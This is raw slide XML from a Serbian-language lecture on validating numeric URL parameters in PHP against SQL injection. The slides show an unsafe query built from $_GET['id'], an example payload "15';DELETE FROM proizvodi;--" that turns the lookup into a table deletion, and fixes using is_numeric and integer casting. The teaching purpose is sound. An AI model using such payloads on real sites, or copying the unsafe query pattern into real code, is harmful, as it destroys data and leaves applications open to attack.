              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>zadatog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>parametra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ispisuje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>informacije</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>proizvodu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ukoliko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>nismo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>provjerili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> da se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>zaista</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>radi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> o ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>parametru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je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>brojna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>vrijednost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> (u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>najvećim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>slučajevima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>jeste</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Napadač</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>lako</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>može</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>izazvati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>greške</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>radu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>aplikacije</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, pa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>čak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SQL injection, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>odnosno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>izmjenu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>samog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>upita</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> za “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>dohvatanje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>informacija</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>proizvodu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tako</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ugroziti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sigurnost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>aplikacije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400"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="sr-Latn-ME" sz="2000" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="sr-Latn-ME" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1960580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738C9-38FF-49E5-A3A5-ED345E7C4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Validacija</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>brojnih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>vrijednosti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>…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57A2C3-9379-4FD3-961E-EBE74D83D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995363"/>
            <a:ext cx="7194550" cy="514667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Primjer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>takvog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>kôda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>može</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>izgledati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ovako</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>:</a:t>
            </a:r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sz="3200" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200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sz="3200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Jasno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> je da bi se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>umjesto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>jednog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>izvršila</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>dva</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>upita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b="0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b="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0" dirty="0" err="1"/>
              <a:t>promjenjiva</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> bi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>izgledala</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ovako</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="sr-Latn-ME" dirty="0">
              <a:cs typeface="Courier New" panose="020703090202050204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2808CE-D4FB-4B5F-BC07-83A7DED85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1524000"/>
            <a:ext cx="8401050" cy="2555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&lt;?php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// www.example.com/proizvod.php?id=15';DELETE FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-RS" sz="1500" dirty="0" err="1">
                <a:latin typeface="Lucida Sans Typewriter" panose="020B0509030504030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>proizvodi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-RS" sz="1500" dirty="0">
                <a:latin typeface="Lucida Sans Typewriter" panose="020B0509030504030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;--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$id = $_GET['id'];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$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-RS" sz="1500" dirty="0" err="1">
                <a:latin typeface="Lucida Sans Typewriter" panose="020B0509030504030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-RS" sz="1500" dirty="0">
                <a:latin typeface="Lucida Sans Typewriter" panose="020B0509030504030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = "SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-RS" sz="1500" dirty="0" err="1">
                <a:latin typeface="Lucida Sans Typewriter" panose="020B0509030504030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>proizvodi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-RS" sz="1500" dirty="0">
                <a:latin typeface="Lucida Sans Typewriter" panose="020B0509030504030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> WHERE id= '$id'";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//...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?&gt;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14AC88-9195-4282-AC07-F1F6247E7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5011737"/>
            <a:ext cx="8401050" cy="113030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 algn="ctr"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SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-RS" sz="1500" dirty="0" err="1">
                <a:latin typeface="Lucida Sans Typewriter" panose="020B0509030504030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>proizvodi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-RS" sz="1500" dirty="0">
                <a:latin typeface="Lucida Sans Typewriter" panose="020B0509030504030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> WHERE id = '15'; DELETE FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-RS" sz="1500" dirty="0" err="1">
                <a:latin typeface="Lucida Sans Typewriter" panose="020B0509030504030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>proizvodi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-RS" sz="1500" dirty="0">
                <a:latin typeface="Lucida Sans Typewriter" panose="020B0509030504030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; --'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2861282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BBD02-938C-4588-A7F9-3401B83A9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Validacija</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>brojnih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>vrijednosti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>…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65E24-4818-4D00-99F2-5A83B4C7D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Validacija</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ovakvog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ulaza</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>inputa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>odnosno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>parametra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, bi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>bila</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>jednostavna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Trebali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> bi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>samo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>osiguramo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> da je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>unijeti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>parametar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>zaista</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>broj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, a da u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ostalim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>slučajevima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>prikažemo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>grešku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>odnosno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>nepostojeću</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>stranu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/>
              <a:t>Za </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>tu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>svrhu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>možemo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>iskoristiti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0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is_numeric</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="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b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>funkciju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r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sr-Latn-M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729F4F-D23A-4611-B8C9-BDE0AAC2B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733800"/>
            <a:ext cx="840105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r>
              <a:rPr lang="en-GB" altLang="sr-Latn-R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if(!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-R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is_numeric</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-R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($_GET['id'])) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" altLang="sr-Latn-R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altLang="sr-Latn-R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   // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-R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prikaži</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-R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404 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-R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stranicu</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="sr-Latn-R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altLang="sr-Latn-R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85522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6C522-08F5-4B18-AD33-7F5EF8A88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Kastovanje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>podataka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5DEB0-2E66-420F-9E81-6700D992A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995363"/>
            <a:ext cx="7194550" cy="5146675"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Međutim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>bolji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>način</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>kastovanje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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>odnosno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>mijenjanje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>tipa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/>
              <a:t>Na </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ovaj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>način</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>definitivno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>osiguravamo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>radimo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pravim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>tipom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>podatka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endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="sr-Latn-M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BA5A2D9-2521-4D3C-98D1-C86F5D96F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3124200"/>
            <a:ext cx="8401050" cy="1898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altLang="sr-Latn-RS" sz="1400" dirty="0">
                <a:latin typeface="Lucida Sans Typewriter" panose="020B0509030504030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-RS" sz="2000" dirty="0">
                <a:latin typeface="Lucida Sans Typewriter" panose="020B0509030504030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$id = (int) $_GET['id']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Lucida Sans Typewriter" panose="020B0509030504030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="sr-Latn-RS" sz="800" dirty="0">
              <a:latin typeface="Lucida Sans Typewriter" panose="020B05090305040302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Lucida Sans Typewriter" panose="020B0509030504030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	if($id == 0) {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Lucida Sans Typewriter" panose="020B0509030504030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    	// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-RS" sz="2000" dirty="0" err="1">
                <a:latin typeface="Lucida Sans Typewriter" panose="020B0509030504030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>prikaži</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-RS" sz="2000" dirty="0">
                <a:latin typeface="Lucida Sans Typewriter" panose="020B0509030504030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 404 </a:t>
            </a:r>
            <a:r>
